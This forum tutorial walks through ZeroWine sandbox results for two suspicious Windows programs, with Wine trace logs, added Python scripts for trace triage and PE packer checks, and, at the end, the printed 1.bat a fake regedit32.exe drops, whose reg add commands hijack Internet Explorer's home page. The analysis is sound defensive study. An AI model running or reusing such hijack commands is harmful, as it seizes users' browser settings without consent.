This post was last edited by roxiel on 2009-12-29 18:36
First, let's look at the layout of the result page.
The upper part of the page is where the warnings go: if the uploaded program forked off several child processes, it says so here.
==========================================================================
Now, starting with Strings: this is the string table, the stuff you can read straight out of the file,
much like what BinText gives you.
==========================================================================
Then File Header.
Besides the packer signature, it mainly covers
DOS_HEADER
NT_HEADERS
FILE_HEADER
OPTIONAL_HEADER
PE Sections
Directories
Imported symbols
and so on; very thorough, down to an MD5 and a SHA hash for every section.
It also tells you, under Signature, which sections look wrong.
==========================================================================
Next, Signature. The screenshot below shows only one malicious indicator: it creates a pipe, something backdoors do all the time.
==========================================================================
Finally, Report.
Heh, very detailed: we can pick out the APIs behind the suspicious behaviour, and sometimes we also get the process list at run time.
Below is a report from a failed analysis; I suggest changing the timeout from 10 to 9999999.
Look familiar? SLEEP. But generally, once you see this, you already know it's no good.
============================== Note: Example 1 starts here ==============================
I picked a game cheat (外挂).
First the page it returned.
Then the Signature:
trace:file:CreateFileW L"\\\\.\\SICE" GENERIC_READ GENERIC_WRITE FILE_SHARE_READ FILE_SHARE_WRITE creation 3 attributes 0x80
trace:file:CreateFileW L"\\\\.\\SIWVID" GENERIC_READ GENERIC_WRITE FILE_SHARE_READ FILE_SHARE_WRITE creation 3 attributes 0x80
trace:file:CreateFileW L"\\\\.\\NTICE" GENERIC_READ GENERIC_WRITE FILE_SHARE_READ FILE_SHARE_WRITE creation 3 attributes 0x80
// This is why I said earlier that it detects SICE
0009:Call advapi32.RegOpenKeyExW(80000002,7eafd840 L"Software\\Microsoft\\Windows NT\\CurrentVersion",00000000,00000001,0032f144) ret=7eae4a62
0009:Call advapi32.RegOpenKeyExW(00000044,7eafd93c L"Drivers32",00000000,00000001,0032f140) ret=7eae4b49
trace:file:CreateFileW L"C:\\windows\\SYSTEM.INI" GENERIC_READ FILE_SHARE_READ FILE_SHARE_WRITE creation 3 attributes 0x80
0009:Call advapi32.RegOpenKeyExW(80000002,7eab9040 L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Drivers32",00000000,00000001,0032d87c) ret=7eab29f8
trace:file:CreateFileW L"C:\\windows\\system.ini" GENERIC_READ FILE_SHARE_READ FILE_SHARE_WRITE creation 3 attributes 0x80
0009:Call advapi32.RegCreateKeyW(80000002,008f0190 L"Software\\Microsoft\\AudioCompressionManager\\DriverCache\\msacm32.dll",0032d02c) ret=7eab249e
0009:Call KERNEL32.CreateProcessW(00000000,0032f750 L"C:\\windows\\system32\\explorer.exe /desktop",00000000,00000000,00000000,00000008,00000000,00000000,0032f9a0,0032f990) ret=7ee52ddc
0009:Call advapi32.RegCreateKeyExW(00000048,7ee7bf40 L"Temporary System Parameters",00000000,00000000,00000001,000f003f,00000000,7eea6690,00000000) ret=7ee438b5
0009:Call advapi32.RegCreateKeyW(80000002,008f01c8 L"Software\\Microsoft\\AudioCompressionManager\\DriverCache\\msacm32.dll",0032fb98) ret=7eab2018
0009:Call advapi32.RegSetValueExA(0000003c,7eab956e "cFormatTags",00000000,00000004,008f013c,00000004) ret=7eab2057
0009:Call advapi32.RegSetValueExA(0000003c,7eab957a "cFilterTags",00000000,00000004,008f0138,00000004) ret=7eab2096
0009:Call advapi32.RegSetValueExA(0000003c,7eab9586 "fdwSupport",00000000,00000004,008f0140,00000004) ret=7eab20d1
0009:Call advapi32.RegSetValueExA(0000003c,7eab9591 "aFormatTagCache",00000000,00000003,008f01b0,00000008) ret=7eab2164
Then the File Header:
This shows it has a file bundled into it.
I'll skip the final REPORT; it contains both the uploaded program's behaviour and ZeroWine's own working behaviour, and if you read it through carefully it will deepen your understanding of how ZeroWine works.
In short, from the SIG and HEADER alone we can already conclude this isn't a normal program.
============================== Note: Example 2 starts here ==============================
A fake regedit32.exe.
Look at the Signature:
trace:file:CreateFileW L"C:\\windows\\1.bat" GENERIC_WRITE FILE_SHARE_READ FILE_SHARE_WRITE FILE_SHARE_DELETE creation 3 attributes 0x80
trace:file:CreateFileW L"C:\\windows\\1.bat" GENERIC_WRITE FILE_SHARE_READ FILE_SHARE_WRITE FILE_SHARE_DELETE creation 1 attributes 0x80
trace:file:CreateFileW L"C:\\windows\\1.bat" GENERIC_WRITE creation 1 attributes 0x80
trace:file:CreateFileW L"C:\\windows\\exeb22.tmp" GENERIC_WRITE creation 1 attributes 0x80
trace:file:CreateFileW L"C:\\windows\\exeb22.tmp" GENERIC_WRITE FILE_SHARE_READ creation 2 attributes 0x80
0009:Call KERNEL32.CreateProcessA(00000000,00122088 ""C:\\windows\\1.bat"",00000000,00000000,00000001,08000000,00000000,00122510 "Z:\\tmp\\vir\\f89af884ba6678dc9865ccce449641d0",0032fb44,0032fcb4) ret=0040cc33
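The trace lines in both examples (the SoftICE probe in example 1 and the dropped 1.bat in example 2) are Wine debug output: `trace:file:CreateFileW ...` lines from the +file channel and `NNNN:Call dll.Func(...) ret=...` lines from the +relay channel. Reading them by hand is what this walkthrough does; the script below is an added example, not ZeroWine's code, that parses both shapes and turns the same reasoning into rules: opening \\.\SICE, \\.\SIWVID or \\.\NTICE is the classic SoftICE presence check; GENERIC_WRITE with a CREATE_NEW/CREATE_ALWAYS disposition is a dropped file; CreateProcess on the dropped file is the execution step. It also sets aside Wine's own housekeeping (the explorer.exe /desktop launch, the msacm32 DriverCache key and values, the Temporary System Parameters key), which the post notes gets mixed into the Report. The sample lines are copied from the post; the rule list and the noise allowlist are this example's own choices.

```python
import re

# The two line shapes on ZeroWine's Signature/Report pages, straight from Wine's debug
# channels: "+file" traces for CreateFileW and "+relay" call traces for everything else.
FILE_RE = re.compile(r'^trace:file:CreateFileW L"(?P<path>.*?)"(?=\s|$)\s*(?P<rest>.*)$')
RELAY_RE = re.compile(r'^[0-9a-fA-F]+:Call (?P<dll>[^.(]+)\.(?P<func>\w+)\((?P<args>.*)\) ret=[0-9a-fA-F]+$')
STR_RE = re.compile(r'L?"(.*?)"(?=,|\)|$)')  # L"wide" or "ansi" argument; inner quotes tolerated

# dwCreationDisposition as Wine prints it after "creation": CREATE_NEW, CREATE_ALWAYS,
# OPEN_ALWAYS, TRUNCATE_EXISTING all mean the sample is writing a file (3 = OPEN_EXISTING)
WRITE_DISPOSITIONS = {1, 2, 4, 5}

# Device names opened by the classic SoftICE presence check (the SICE check in the post)
SOFTICE_DEVICES = {r"\\.\SICE", r"\\.\SIWVID", r"\\.\NTICE"}

# Wine's own housekeeping inside the sandbox, which the post notes gets mixed into the
# Report. Allowlist chosen for this example from the lines quoted in the post.
WINE_NOISE = (
    "explorer.exe /desktop",                                        # Wine desktop process
    r"Software\Microsoft\AudioCompressionManager\DriverCache",      # msacm32 driver cache key
    "cFormatTags", "cFilterTags", "fdwSupport", "aFormatTagCache",  # ...and its values
    "Temporary System Parameters",                                  # user32 settings cache
)


def unescape(s):
    """Wine prints every backslash doubled; fold them back to a real Windows path."""
    return s.replace("\\\\", "\\")


def parse_line(line):
    """One trace line -> event dict, or None for anything else."""
    m = FILE_RE.match(line)
    if m:
        rest = m.group("rest")
        cm = re.search(r"creation (\d+)", rest)
        return {"kind": "file", "path": unescape(m.group("path")),
                "write": "GENERIC_WRITE" in rest.split(),
                "creation": int(cm.group(1)) if cm else None}
    m = RELAY_RE.match(line)
    if m:
        strings = [unescape(s.strip('"')) for s in STR_RE.findall(m.group("args"))]
        return {"kind": "call", "dll": m.group("dll"), "func": m.group("func"), "strings": strings}
    return None


def triage(lines):
    """Tag every parsed event; returns (tag, detail) pairs in trace order."""
    findings = []
    for line in lines:
        ev = parse_line(line.strip())
        if ev is None:
            continue
        if ev["kind"] == "file":
            if ev["path"].upper() in SOFTICE_DEVICES:
                findings.append(("anti-debug", f"SoftICE device probe: {ev['path']}"))
            elif ev["write"] and ev["creation"] in WRITE_DISPOSITIONS:
                findings.append(("drops-file", ev["path"]))
            continue
        target = ev["strings"][0] if ev["strings"] else ""
        if any(n.lower() in target.lower() for n in WINE_NOISE):
            findings.append(("wine-noise", f"{ev['func']} {target}"))
        elif ev["func"].startswith("CreateProcess"):
            findings.append(("spawns-process", target))
        elif ev["func"].startswith(("RegCreateKey", "RegOpenKeyEx")):
            findings.append(("reg-key", target))
        elif ev["func"].startswith("RegSetValueEx"):
            findings.append(("reg-write", target))  # only a handle here; the key path is in the Ret line
    return findings


def summarize(lines):
    """tag -> sorted, de-duplicated details."""
    out = {}
    for tag, detail in triage(lines):
        out.setdefault(tag, set()).add(detail)
    return {tag: sorted(d) for tag, d in out.items()}


def verdict(lines):
    """The post's rule of thumb: anti-debug tricks, dropped files or spawned children = not a normal program."""
    return bool({"anti-debug", "drops-file", "spawns-process"} & set(summarize(lines)))


# Lines copied from the post (example 1: the game cheat; example 2: the fake regedit32.exe).
EXAMPLE1 = r'''
trace:file:CreateFileW L"\\\\.\\SICE" GENERIC_READ GENERIC_WRITE FILE_SHARE_READ FILE_SHARE_WRITE creation 3 attributes 0x80
trace:file:CreateFileW L"\\\\.\\SIWVID" GENERIC_READ GENERIC_WRITE FILE_SHARE_READ FILE_SHARE_WRITE creation 3 attributes 0x80
trace:file:CreateFileW L"\\\\.\\NTICE" GENERIC_READ GENERIC_WRITE FILE_SHARE_READ FILE_SHARE_WRITE creation 3 attributes 0x80
0009:Call advapi32.RegOpenKeyExW(80000002,7eafd840 L"Software\\Microsoft\\Windows NT\\CurrentVersion",00000000,00000001,0032f144) ret=7eae4a62
0009:Call KERNEL32.CreateProcessW(00000000,0032f750 L"C:\\windows\\system32\\explorer.exe /desktop",00000000,00000000,00000000,00000008,00000000,00000000,0032f9a0,0032f990) ret=7ee52ddc
0009:Call advapi32.RegSetValueExA(0000003c,7eab956e "cFormatTags",00000000,00000004,008f013c,00000004) ret=7eab2057
'''.strip().splitlines()
EXAMPLE2 = r'''
trace:file:CreateFileW L"C:\\windows\\1.bat" GENERIC_WRITE FILE_SHARE_READ FILE_SHARE_WRITE FILE_SHARE_DELETE creation 3 attributes 0x80
trace:file:CreateFileW L"C:\\windows\\1.bat" GENERIC_WRITE creation 1 attributes 0x80
trace:file:CreateFileW L"C:\\windows\\exeb22.tmp" GENERIC_WRITE FILE_SHARE_READ creation 2 attributes 0x80
0009:Call KERNEL32.CreateProcessA(00000000,00122088 ""C:\\windows\\1.bat"",00000000,00000000,00000001,08000000,00000000,00122510 "Z:\\tmp\\vir\\f89af884ba6678dc9865ccce449641d0",0032fb44,0032fcb4) ret=0040cc33
'''.strip().splitlines()

if __name__ == "__main__":
    for name, sample in (("example 1", EXAMPLE1), ("example 2", EXAMPLE2)):
        print(f"{name}: {'suspicious' if verdict(sample) else 'nothing flagged'}")
        for tag, details in sorted(summarize(sample).items()):
            print(f"  {tag:15} {'; '.join(details)}")
```

To run it on a real ZeroWine report, feed `triage()` the report's lines; RegSetValueEx lines only carry a key handle, so tying a value write back to its key needs the matching `Ret` line, which the Signature page does not show.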
Then the HEADER:
----------Signature----------
UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
----------Parsing Warnings----------
Suspicious flags set for section 0. Both IMAGE_SCN_MEM_WRITE and IMAGE_SCN_MEM_EXECUTE are set.This might indicate a packed executable.
Suspicious flags set for section 1. Both IMAGE_SCN_MEM_WRITE and IMAGE_SCN_MEM_EXECUTE are set.This might indicate a packed executable.
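The Signature line above is a PEiD-style packer signature match, and the two Parsing Warnings come purely from the section table (the warning text is pefile's, the PE parser ZeroWine's File Header page is built on): UPX leaves IMAGE_SCN_MEM_WRITE and IMAGE_SCN_MEM_EXECUTE both set on UPX0 and UPX1 because the stub decompresses into them and then jumps there. The per-section MD5/SHA listed on the File Header page come from the same table. The script below is an added example, not ZeroWine's or pefile's code: it walks DOS header, PE signature, FILE_HEADER, OPTIONAL_HEADER and the section table with struct, hashes every section, reproduces the W+X warning, and adds two further packer heuristics (an executable section with no raw data, and an entry point inside a writable section). The bytes it analyses are constructed in build_sample_pe() with a UPX0/UPX1/.rsrc layout; they are not the regedit32.exe from the post, and the function and field names are this example's own.

```python
import hashlib
import math
import struct

# IMAGE_SECTION_HEADER.Characteristics bits (winnt.h)
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_CNT_UNINITIALIZED_DATA = 0x00000080
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
FLAG_NAMES = [(IMAGE_SCN_CNT_CODE, "CODE"), (IMAGE_SCN_CNT_INITIALIZED_DATA, "IDATA"),
              (IMAGE_SCN_CNT_UNINITIALIZED_DATA, "UDATA"), (IMAGE_SCN_MEM_EXECUTE, "X"),
              (IMAGE_SCN_MEM_READ, "R"), (IMAGE_SCN_MEM_WRITE, "W")]


def entropy(buf):
    """Shannon entropy in bits per byte; compressed or encrypted data sits close to 8."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(data):
    """DOS header -> PE signature -> IMAGE_FILE_HEADER -> optional header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    fh = e_lfanew + 4
    machine, nsec, _ts, _sym, _nsym, opt_size, _chars = struct.unpack_from("<HHIIIHH", data, fh)
    opt = fh + 20
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]  # AddressOfEntryPoint
    sections = []
    for i in range(nsec):
        name, vsize, vaddr, rsize, rptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        raw = data[rptr:rptr + rsize] if rsize else b""  # what the per-section hashes cover
        sections.append({"index": i, "name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "vaddr": vaddr, "vsize": vsize, "rptr": rptr, "rsize": rsize,
                         "characteristics": chars,
                         "flags": "|".join(n for bit, n in FLAG_NAMES if chars & bit),
                         "md5": hashlib.md5(raw).hexdigest(), "sha1": hashlib.sha1(raw).hexdigest(),
                         "entropy": entropy(raw)})
    return {"machine": machine, "entry_point": entry_rva, "sections": sections}


def section_for_rva(sections, rva):
    for s in sections:
        if s["vaddr"] <= rva < s["vaddr"] + max(s["vsize"], s["rsize"]):
            return s
    return None


def packer_warnings(pe):
    """The check behind the 'Parsing Warnings' above, plus two common extra heuristics."""
    warns = []
    for s in pe["sections"]:
        c = s["characteristics"]
        if c & IMAGE_SCN_MEM_WRITE and c & IMAGE_SCN_MEM_EXECUTE:
            warns.append(f"Suspicious flags set for section {s['index']}. Both IMAGE_SCN_MEM_WRITE "
                         f"and IMAGE_SCN_MEM_EXECUTE are set. This might indicate a packed executable.")
        if s["rsize"] == 0 and s["vsize"] and c & IMAGE_SCN_MEM_EXECUTE:
            warns.append(f"Section {s['index']} ({s['name']}) is executable but has no raw data: "
                         f"room for an unpacking stub to write into")
        if s["entropy"] > 7.0:
            warns.append(f"Section {s['index']} ({s['name']}) entropy {s['entropy']:.2f}: compressed or encrypted")
    ep = section_for_rva(pe["sections"], pe["entry_point"])
    if ep is None:
        warns.append(f"Entry point 0x{pe['entry_point']:x} is outside every section")
    elif ep["characteristics"] & IMAGE_SCN_MEM_WRITE:
        warns.append(f"Entry point 0x{pe['entry_point']:x} is in writable section {ep['name']}")
    return warns


def build_sample_pe():
    """Constructed PE32 with the UPX0/UPX1/.rsrc layout (not a real binary); the section table
    alone is enough to trigger the same two warnings the post shows."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)  # e_lfanew
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 3, 0, 0, 0, 224, 0x102)
    opt = struct.pack("<HBBIIIII", 0x10B, 0, 0, 0x1000, 0x400, 0x1000, 0x2010, 0x2000).ljust(224, b"\0")
    sect = struct.pack("<8sIIIIIIHHI", b"UPX0", 0x1000, 0x1000, 0, 0x200, 0, 0, 0, 0, 0xE0000080)
    sect += struct.pack("<8sIIIIIIHHI", b"UPX1", 0x1000, 0x2000, 0x200, 0x200, 0, 0, 0, 0, 0xE0000040)
    sect += struct.pack("<8sIIIIIIHHI", b".rsrc", 0x200, 0x3000, 0x200, 0x400, 0, 0, 0, 0, 0xC0000040)
    headers = (bytes(dos) + b"PE\0\0" + file_hdr + opt + sect).ljust(0x200, b"\0")
    upx1_raw = bytes(range(256)) * 2               # stand-in for a compressed payload
    rsrc_raw = b"regedit32\0".ljust(0x200, b"\0")  # mostly zeros: low entropy
    return headers + upx1_raw + rsrc_raw


if __name__ == "__main__":
    pe = parse_pe(build_sample_pe())
    for s in pe["sections"]:
        print(f"{s['index']} {s['name']:8} rva=0x{s['vaddr']:05x} raw=0x{s['rsize']:04x} "
              f"{s['flags']:14} H={s['entropy']:.2f} md5={s['md5']}")
    for w in packer_warnings(pe):
        print("WARNING:", w)
```

On a real sample replace `build_sample_pe()` with `open(path, "rb").read()`; the W+X flags are the cheap static tell, the entry point sitting in a writable section is the confirmation that the code at the entry is an unpacking stub rather than the program itself.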
REPORT: as usual I'm not writing it out.
Here is the 1.bat it dropped:
@rem ----- ExeScript Options Begin -----
@rem ScriptType: console,silent
@rem DestDirectory: temp
@rem Icon: D:\Program Files\ExeScript\regedit.ico
@rem OutputFile: C:\Documents and Settings\Administrator\
\regedit32.exe
@rem ----- ExeScript Options End -----
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d www.365wz.net/?15 /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Default_Page_URL" /t reg_sz /d www.365wz.net/?15 /f
reg add "HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command" /ve /t reg_sz /d "C:\Program Files\Internet Explorer\iexplore.exe www.365wz.net/?15" /f
So it's well worth setting up a VMware VM with a shadow-system sandbox as well; next lesson we'll cover how to recover the files the virus generates.